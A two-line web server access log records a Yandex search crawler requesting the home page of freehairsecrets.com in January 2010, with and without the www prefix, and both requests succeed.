95.108.150.235 - - [11/Jan/2010:02:12:48 -0800] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.freehairsecrets.com"
95.108.150.235 - - [11/Jan/2010:02:12:49 -0800] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "freehairsecrets.com"
